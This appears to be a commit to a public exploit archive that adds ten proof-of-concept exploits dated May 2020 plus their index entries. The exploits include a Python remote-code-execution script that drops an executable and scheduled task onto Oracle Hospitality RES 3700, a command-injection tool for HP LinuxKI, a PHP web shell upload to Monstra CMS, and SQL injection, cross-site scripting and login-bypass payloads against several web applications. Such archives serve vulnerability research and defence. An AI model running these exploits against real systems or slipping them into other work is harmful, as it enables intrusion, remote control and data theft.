DB: 2020-05-19

10 changes to exploits/shellcodes

HP LinuxKI 6.01 - Remote Command Injection
Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection
Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection
Online Examination System 1.0 - 'eid' SQL Injection
Oracle Hospitality RES 3700 5.7 - Remote Code Execution
forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting
Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload
online Chatting System 1.0 - 'id' SQL Injection
Online Healthcare Patient Record Management System 1.0 - Authentication Bypass
Online Healthcare management system 1.0 - Authentication Bypass
This commit is contained in:
Offensive Security 2020-05-19 05:01:51 +00:00
parent a5ffe5baef
commit 6aad755e5e
11 changed files with 516 additions and 0 deletions

View file

@ -0,0 +1,22 @@
# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection
# Exploit Author: jul10l1r4 (Julio Lira)
# Google Dork: N/A
# Date: 2020-05-16
# Vendor Homepage: https://mikrotik.com
# Software Link: https://mikrotik.com/download
# Version: <= 1.2.3
# Tested on: Debian 10 buster
# CVE: 2020-13118
Description: SQL Injection found in check_community.php:49
$community = $_GET['community'];
$_SESSION['community'] = $community;
$query = "SELECT name from router where `community`='
$community'";
PoC:
http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI
SQLmap using:
sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3

View file

@ -0,0 +1,65 @@
# Exploit Title: Oracle Hospitality RES 3700 5.7 - Remote Code Execution
# Date: 2019-10-01
# Exploit Author: Walid Faour
# Vendor Homepage: https://www.oracle.com/industries/food-beverage/products/res-3700/
# Software Link: N/A (Available to customers)
# Version: <= v5.7
# Tested on: Windows Server 2003 / Windows Server 2008
# CVE : CVE-2019-3025
#!/usr/bin/env python
#Author: Walid Faour
#Date: Aug. 2, 2019
#Oracle Hospitality RES 3700 Release 4.9 Exploit
import binascii
import requests
print
print '-------------------------------------------------'
print 'Oracle Hospitality RES 3700 Release 4.9 - Exploit'
print '-------------------------------------------------'
print
IP = raw_input("Enter the IP address: ")
URL = "http://" + IP + ":50123"
f = open("attacker-4.9.exe",'rb')
raw_payload = f.read()
payload_hex = binascii.hexlify(raw_payload)
f.close()
g = open("attacker-4.9.job",'rb')
raw_task = g.read()
scheduled_task_hex = binascii.hexlify(raw_task)
g.close()
def exploit_body(data,full_path):
body = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> \
<SOAP-ENV:Body xmlns:MCRS-ENV="MCRS-URI"> \
<MCRS-ENV:Service>MDSSYSUTILS</MCRS-ENV:Service> \
<MCRS-ENV:Method>TransferFile</MCRS-ENV:Method> \
<MCRS-ENV:SessionKey>Session</MCRS-ENV:SessionKey> \
<MCRS-ENV:InputParameters> \
<dst>' + full_path + '</dst> \
<fn>' + full_path + '</fn> \
<data>' + data + '</data> \
</MCRS-ENV:InputParameters> \
</SOAP-ENV:Body> \
</SOAP-ENV:Envelope>'
return body
def exploit_headers(body):
headers = {
"Content-Type" : "text/xml",
"User-Agent" : "MDS POS Client",
"Host" : IP + ":50123",
"Content-Length" : str(len(body)),
"Connection" : "Keep-Alive"
}
return headers
print 'Exploiting Oracle Hospitality RES 3700 at IP address ' + IP + '...'
body_payload = exploit_body(payload_hex,"C:\\Windows\\System32\\attacker-4.9.exe")
body_task = exploit_body(scheduled_task_hex,"C:\\Windows\\Tasks\\attacker-4.9.job")
send_payload = requests.post(URL,data=body_payload,headers=exploit_headers(body_payload))
send_task = requests.post(URL,data=body_task,headers=exploit_headers(body_task))

View file

@ -0,0 +1,40 @@
Exploit Title: HP LinuxKI 6.01 - Remote Command Injection
Date: 2020-05-17
Exploit Author: Cody Winkler
Vendor Homepage: https://www.hpe.com/us/en/home.html
Software Link: https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-1
Version: <= v6.0-1
Tested on: LinuxKI Docker Image
CVE: CVE-2020-7209
#!/usr/bin/env python3
import requests
import argparse
import sys
import re
def parse_options():
formatter = lambda prog: argparse.HelpFormatter(prog,max_help_position=50)
parser = argparse.ArgumentParser(description='HP LinuxKI <= 6.0-1 RCE - CVE-2020-7209', formatter_class=formatter)
parser.add_argument("-i", "--ip", dest='host', type=str, help="Target Hostname/IP", required=True)
parser.add_argument("-p", "--port", dest='port', type=str, help="Target Port", required=True)
parser.add_argument("-c", "--cmd", dest='cmd', type=str, help="Command to execute", required=True)
args = parser.parse_args()
return args
def main(args):
host = args.host
port = args.port
cmd = args.cmd
path = '/linuxki/experimental/vis/kivis.php?type=kitrace&pid=15;echo BEGIN;%s;echo END;' % cmd
rce = requests.get('http://' + host + ':' + port + path, verify=False)
output = rce.text
a, b = output.find('BEGIN'), output.find('END')
print(output[a+6:b])
if __name__ in "__main__":
args = parse_options()
main(args)

View file

@ -0,0 +1,91 @@
# Exploit Title: Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection
# Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang
# Google Dork: N/A
# Date: 2020-05-18
# Vendor Homepage: https://connekthq.com/plugins/ajax-load-more/
# Software Link: https://vi.wordpress.org/plugins/ajax-load-more/
# Version: <= 5.3.1
# Tested on: Ubuntu 18.04
Description:
A blind SQL injection vulnerability is present in Ajax load more.
$wpdb->get_var("SELECT repeaterDefault FROM " . $table_name . " WHERE name
= '$n'");
POC:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: lab-pwn.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
Firefox/76.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://lab-pwn.com/wordpress/wp-admin/admin.php?page=ajax-load-more-repeaters
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 597
Origin: http://lab-pwn.com
Connection: close
Cookie:
wordpress_ce916d86f593e303743adeb31ce28da7=admin%7C1589950799%7CCMYSDjadMRtkKIav5orz6knKlOvE7Bz8d67ACwFl5fl%7Cab29a771b72eed2d65f02d50fd24ea85ae85f38d0fcc41abb56797fb8c7590a3;
wordpress_logged_in_ce916d86f593e303743adeb31ce28da7=admin%7C1589950799%7CCMYSDjadMRtkKIav5orz6knKlOvE7Bz8d67ACwFl5fl%7Cb14c3363c0174d9eb93e2d2bbdd3627b293ea3e8fa8a1080325f62bb462938e2;
wp-settings-time-1=1589773793; PHPSESSID=0lsvlo9il6ibjiuflljl3qcub1
action=alm_update_repeater&value=%3Cli+%3C%3Fphp+if+(!has_post_thumbnail())+%7B+%3F%3E+class%3D%22no-img%22%3C%3Fphp+%7D+%3F%3E%3E%0A+++%3C%3Fphp+if+(+has_post_thumbnail()+)+%7B+the_post_thumbnail('alm-thumbnail')%3B+%7D%3F%3E%0A+++%3Ch3%3E%3Ca+href%3D%22%3C%3Fphp+the_permalink()%3B+%3F%3E%22+title%3D%22%3C%3Fphp+the_title()%3B+%3F%3E%22%3E%3C%3Fphp+the_title()%3B+%3F%3E%3C%2Fa%3E%3C%2Fh3%3E%0A+++%3Cp+class%3D%22entry-meta%22%3E%3C%3Fphp+the_time(%22F+d%2C+Y%22)%3B+%3F%3E%3C%2Fp%3E%0A+++%3C%3Fphp+the_excerpt()%3B+%3F%3E%0A%3C%2Fli%3E&repeater='
or sleep(5)#&type=test&alias=&nonce=ae68ab8c91
SQL map:
custom injection marker ('*') found in option '--data'. Do you want to
process it? [Y/n/q]
[12:43:16] [INFO] resuming back-end DBMS 'mysql'
[12:43:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: action=alm_update_repeater&value=<li <?php if
(!has_post_thumbnail()) { ?> class="no-img"<?php } ?>>
<?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail');
}?>
<h3><a href="<?php the_permalink(); ?>" title="<?php the_title();
?>"><?php the_title(); ?></a></h3>
<p class="entry-meta"><?php the_time("F d, Y"); ?></p>
<?php the_excerpt(); ?>
</li>&repeater=-2104' OR 5557=5557-- dHBa#&type=test&alias=&nonce=ae68ab8c91
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: action=alm_update_repeater&value=<li <?php if
(!has_post_thumbnail()) { ?> class="no-img"<?php } ?>>
<?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail');
}?>
<h3><a href="<?php the_permalink(); ?>" title="<?php the_title();
?>"><?php the_title(); ?></a></h3>
<p class="entry-meta"><?php the_time("F d, Y"); ?></p>
<?php the_excerpt(); ?>
</li>&repeater=' OR (SELECT 3214 FROM(SELECT
COUNT(*),CONCAT(0x716a6b7a71,(SELECT
(ELT(3214=3214,1))),0x716a716b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
AHqK#&type=test&alias=&nonce=ae68ab8c91
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: action=alm_update_repeater&value=<li <?php if
(!has_post_thumbnail()) { ?> class="no-img"<?php } ?>>
<?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail');
}?>
<h3><a href="<?php the_permalink(); ?>" title="<?php the_title();
?>"><?php the_title(); ?></a></h3>
<p class="entry-meta"><?php the_time("F d, Y"); ?></p>
<?php the_excerpt(); ?>
</li>&repeater=' OR SLEEP(5)-- pExJ#&type=test&alias=&nonce=ae68ab8c91
---
[12:43:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0

View file

@ -0,0 +1,53 @@
# Exploit Title: Online Examination System 1.0 - 'eid' SQL Injection
# Google Dork: N/A
# Date: 2020-05-16
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14210/online-examination-system-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlineexamination.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
#Description:
Online Examination System Project is vulnerable to
SQL injection via the 'eid' parameter on the account.php page.
# Create a new account and Move to the profile on top right side (click)
# vulnerable file : account.php
# vulnerable Parameter: eid
http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5
Parameter: eid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: q=quiz&step=2&eid=5589741f9ed52' AND 1509=1509 AND 'aIOb'='aIOb&n=1&t=5
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4105 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(4105=4105,1))),0x717a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ytnk'='Ytnk&n=1&t=5
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4498 FROM (SELECT(SLEEP(5)))EAAg) AND 'OoDV'='OoDV&n=1&t=5
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: q=quiz&step=2&eid=5589741f9ed52' UNION ALL SELECT NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL-- iOWr&n=1&t=5
---
[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache 2.4.39, PHP 7.2.18
back-end DBMS: MySQL >= 5.0
# Proof of Concept:
http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=sqli&n=1&t=5
http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5
GET /onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=l61egdpolqmktgtuoedjqmktge
Connection: keep-alive
Upgrade-Insecure-Requests: 1
q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5

View file

@ -0,0 +1,25 @@
# Exploit Title: forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting
# Date: 2020-05-15
# Exploit Author: Daniel Ortiz
# Vendor Homepage: https://sourceforge.net/projects/forma/
# Software link: https://sourceforge.net/projects/forma/files/latest/download
# Tested on: XAMPP for Linux 64bit 5.6.40-0
## 1 -Course Module
- Vulnerable parameter: course_code, course_name, course_box_descr, course_descr
- Payload: <SCRIPT>alert('XSS');</SCRIPT>
- Details: There is no control or security mechanism on this field. Specials characters are not encoded or filtered.
- Privileges: It requires admin.
- Location: Admin Area > E-learning > Courses > Courses > Edit Course
- Endopoint: /formalms/appCore/index.php?r=alms/course/modcourse
## 1 -Profile Module
- Vulnerable parameter: Email
- Payload: <div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onmouseover=alert('xss') )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
- Details: There is some control on this field but can bypassed.
- Privileges: Do not requires admin or student account.
- Location: My Profile > Edit > Put the payload in Email field.
- Endpoint: /formalms/appLms/index.php?r=lms/profile/show&ap=saveinfo

View file

@ -0,0 +1,58 @@
# Exploit Title: Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload
# Google Dork: N/A
# Date: 2020-05-18
# Exploit Author: Kishan Lal Choudhary
# Vendor Homepage: https://monstra.org
# Software Link: https://bitbucket.org/awilum/monstra/downloads/monstra-3.0.4.zip
# Version: 3.0.4
# Tested on: Ubuntu
1. Goto: http://192.168.2.5/monstra/admin/index.php?id=filesmanager&path=uploads/
2. Upload a one liner shell with php7 extenstion ie: shell.php7
#burp request
------------------------------------EOF-----------------------------------------------------
POST /monstra/admin/index.php?id=filesmanager HTTP/1.1
Host: 192.168.2.5
Content-Length: 548
Cache-Control: max-age=0
Origin: http://192.168.2.5
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.5/monstra/admin/index.php?id=filesmanager
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328
Connection: close
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="csrf"
2e6ae2353998caa319aae262b113c6b3f17a9636
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="file"; filename="shell.php7"
Content-Type: application/octet-stream
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="upload_file"
Upload
------WebKitFormBoundarytRfyCkYq8NvztDBf--
------------------------------------EOF-----------------------------------------------------
3. trigger your shell by visiting http://192.168.2.5/monstra/public/uploads/shell.php7?cmd=id
We have successfully got Remote Code execution

View file

@ -0,0 +1,47 @@
# Exploit Title: online Chatting System 1.0 - 'id' SQL Injection
# Google Dork: N/A
# Date: 2020-05-17
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14224/online-chatting-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlinechatting.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com
# Discription:
The online Chatting System v1.0 application is vulnerable to SQL injection via the 'id' parameter on the chatroom.php page.
# vulnerable file : chatroom.php
http://localhost/chat_system/user/chatroom.php?id=5
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5' AND 2674=2674 AND 'NdtA'='NdtA
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=5' AND (SELECT 8144 FROM(SELECT COUNT(*),CONCAT(0x7171717a71,(SELECT (ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OIwS'='OIwS
Type: time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=5' AND 4648=BENCHMARK(5000000,MD5(0x67644874)) AND 'oSJd'='oSJd
---
[INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 7.2.18
back-end DBMS: MySQL >= 5.0
# Proof of Concept:
http://localhost/chat_system/user/chatroom.php?id=5
GET /chat_system/user/chatroom.php?id=5%27%20AND%20(SELECT%208144%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717a71,(SELECT%20(ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27OIwS%27=%27OIwS HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mstb1630gvh0f97me7qdh5f7ke
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
id=5%27%20AND%20(SELECT%208144%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717a71,(SELECT%20(ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27OIwS%27=%27OIwS

View file

@ -0,0 +1,64 @@
# Exploit Title: Online Healthcare Patient Record Management System 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-05-18
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14217/online-healthcare-patient-record-management-system-using-phpmysql.html
# Version: N/A
# Tested on: Kali Linux 2020.2 x64
# CVE : N/A
The Online Healthcare Patient Record Management System suffers from multiple authentication bypass vulnerabilities:
The login.php file allows a user to just supply or 1=1 as a username and whatever password and bypass the authentication
<?php
session_start();
if(ISSET($_POST['login'])){
$username = $_POST['username'];
$password = $_POST['password'];
$conn = new mysqli("localhost", "root", "", "hcpms") or die(mysqli_error());
$query = $conn->query("SELECT * FROM `user` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error());
The same happens with login.php for the admin area:
<?php
session_start();
$username = $_POST['username'];
$password = $_POST['password'];
if(ISSET($_POST['login'])){
$conn = new mysqli("localhost", "root", "", "hcpms") or die(mysqli_error());
$query = $conn->query("SELECT *FROM `admin` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error());
$fetch = $query->fetch_array();
$valid = $query->num_rows;
if($valid > 0){
$_SESSION['admin_id'] = $fetch['admin_id'];
header("location:home.php");
There is also an authentication bypass issue located in add_user.php:
<?php
if(ISSET($_POST['save_user'])){
$username = $_POST['username'];
$password = $_POST['password'];
$firstname = $_POST['firstname'];
$middlename = $_POST['middlename'];
$lastname = $_POST['lastname'];
$section = $_POST['section'];
$conn = new mysqli("localhost", "root", "", "hcpms");
$q1 = $conn->query("SELECT * FROM `user` WHERE `username` = '$username'") or die(mysqli_error());
$f1 = $q1->fetch_array();
$c1 = $q1->num_rows;
if($c1 > 0){
echo "<script>alert('Username already taken')</script>";
}else{
$conn->query("INSERT INTO `user` VALUES('', '$username', '$password', '$firstname', '$middlename', '$lastname', '$section')");
header("location: user.php");
}
}
If a request is made with the required parameters, any user can create an admin account (no authentication is required to do this).
Finally, there are many SQL injection vulnerabilities (GET parameters directly passed to SQL queries), but those are authenticated

View file

@ -0,0 +1,41 @@
# Exploit Title: Online Healthcare management system 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-05-16
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14217/online-healthcare-patient-record-management-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlinehealthcare.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : admin/index.php || admin/login.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/onlinehealthcare/admin/login.php
POST /onlinehealthcare/admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------293261110021842
Content-Length: 356
Referer: http://localhost/onlinehealthcare/admin/index.php
Cookie: _ga=GA1.1.1353584531.1478253768
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------293261110021842: undefined
Content-Disposition: form-data; name="username"
'=''or'
-----------------------------293261110021842
Content-Disposition: form-data; name="password"
'=''or'
-----------------------------293261110021842
Content-Disposition: form-data; name="login"
-----------------------------293261110021842--

View file

@ -18147,6 +18147,7 @@ id,file,description,date,author,type,platform,port
48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows,
48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple,
48421,exploits/multiple/remote/48421.txt,"Saltstack 3000.1 - Remote Code Execution",2020-05-05,"Jasper Lievisse Adriaanse",remote,multiple,
48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42703,3 +42704,12 @@ id,file,description,date,author,type,platform,port
48471,exploits/php/webapps/48471.txt,"E-Commerce System 1.0 - Unauthenticated Remote Code Execution",2020-05-14,SunCSR,webapps,php,
48472,exploits/php/webapps/48472.py,"vBulletin 5.6.1 - 'nodeId' SQL Injection",2020-05-15,Photubias,webapps,php,
48473,exploits/java/webapps/48473.txt,"ManageEngine Service Desk 10.0 - Cross-Site Scripting",2020-05-15,"Felipe Molina",webapps,java,
48474,exploits/hardware/webapps/48474.txt,"Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection",2020-05-18,jul10l1r4,webapps,hardware,
48475,exploits/php/webapps/48475.txt,"Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection",2020-05-18,"Nguyen Khang",webapps,php,
48476,exploits/php/webapps/48476.txt,"Online Examination System 1.0 - 'eid' SQL Injection",2020-05-18,BKpatron,webapps,php,
48477,exploits/java/webapps/48477.txt,"Oracle Hospitality RES 3700 5.7 - Remote Code Execution",2020-05-18,"Walid Faour",webapps,java,
48478,exploits/php/webapps/48478.txt,"forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting",2020-05-18,"Daniel Ortiz",webapps,php,
48479,exploits/php/webapps/48479.txt,"Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload",2020-05-18,"Kishan Lal Choudhary",webapps,php,
48480,exploits/php/webapps/48480.txt,"online Chatting System 1.0 - 'id' SQL Injection",2020-05-18,BKpatron,webapps,php,
48481,exploits/php/webapps/48481.txt,"Online Healthcare Patient Record Management System 1.0 - Authentication Bypass",2020-05-18,"Daniel Monzón",webapps,php,
48482,exploits/php/webapps/48482.txt,"Online Healthcare management system 1.0 - Authentication Bypass",2020-05-18,BKpatron,webapps,php,

Can't render this file because it is too large.